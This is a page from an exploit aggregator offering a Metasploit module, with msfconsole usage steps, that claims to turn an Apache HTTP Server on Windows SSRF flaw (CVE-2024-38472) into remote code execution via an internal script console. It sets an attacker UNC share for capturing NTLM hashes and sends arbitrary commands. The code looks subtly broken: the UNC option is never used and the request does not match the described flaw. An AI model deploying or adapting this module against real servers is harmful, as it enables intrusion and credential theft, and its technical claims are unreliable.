Share
## https://sploitus.com/exploit?id=CDC791CD-A414-5ABE-A897-7CFA3C2D3D29
Creating a Remote Code Execution (RCE) Metasploit module for the SSRF vulnerability (CVE-2024-38472) in Apache HTTP Server on Windows is challenging because SSRF itself doesn't directly result in RCE. However, SSRF can often be a step toward achieving RCE, especially if you can use it to interact with internal services or trigger a secondary vulnerability.

### Strategy for RCE via SSRF

To achieve RCE through SSRF, we would generally need:
1. An internal service vulnerable to a specific attack that can be exploited via SSRF.
2. A misconfiguration or additional vulnerability that allows for arbitrary code execution.

For this example, let's assume that we can trigger a secondary service internally that accepts HTTP requests and can be tricked into executing arbitrary code (like a Jenkins server or another service with an exposed API).

### Example Metasploit Module

We'll craft a Metasploit module that attempts to achieve RCE by exploiting the SSRF to interact with an internal service. In this case, we'll simulate an internal Jenkins server with an exposed script console that we can abuse for RCE.

Save the following code as `apache_unc_ssrf_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache HTTP Server Windows UNC SSRF to RCE',
      'Description'    => %q{
        This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
        which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
        services like Jenkins.
      },
      'Author'         =>
        [
          'Your Name'  # Your name or handle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-38472'],
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => ['win'],
      'Arch'           => [ARCH_CMD],
      'Targets'        => [
        ['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
      ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOSTS,
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
        OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
        OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
        OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    ssrf_payload = {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path),
      'version' => '1.1',
      'headers' => {
        'Host' => datastore['RHOSTS'],
        'Content-Type' => 'application/x-www-form-urlencoded'
      },
      'data'    => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
    }

    begin
      print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
      res = send_request_cgi(ssrf_payload)

      if res && res.code == 200
        print_good("Successfully triggered the internal service")
      else
        print_error("Failed to trigger the internal service: #{res.inspect}")
      end
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.message}")
    rescue ::Interrupt
      print_status("User interrupted the module execution")
    rescue ::Exception => e
      print_error("An unexpected error occurred: #{e.message}")
    end
  end
end
```

### Usage Instructions

1. **Save the Module**:
   Save the module as `apache_unc_ssrf_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

   ```bash
   /path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
   ```

2. **Load Metasploit**:
   Start Metasploit Framework by opening a terminal and running:

   ```bash
   msfconsole
   ```

3. **Use the New Module**:
   In the Metasploit console, load the new exploit module using the following command:

   ```bash
   use exploit/multi/http/apache_unc_ssrf_rce
   ```

4. **Configure and Run**:
   Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, `UNC_SERVER`, `INTERNAL_SERVICE`, and `CMD`. Then run the module.

   ```bash
   msf6 > use exploit/multi/http/apache_unc_ssrf_rce
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
   RHOSTS => target_ip
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
   RPORT => 80
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
   TARGETURI => /
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
   UNC_SERVER => \\attacker-server\share
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
   INTERNAL_SERVICE => http://internal-service/script
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
   CMD => calc.exe
   msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
   ```

### Important Considerations
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.

This enhanced Metasploit module sends a crafted request to the vulnerable Apache HTTP server on Windows, attempting to trigger the SSRF vulnerability and leverage it to achieve RCE by interacting with an internal service. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.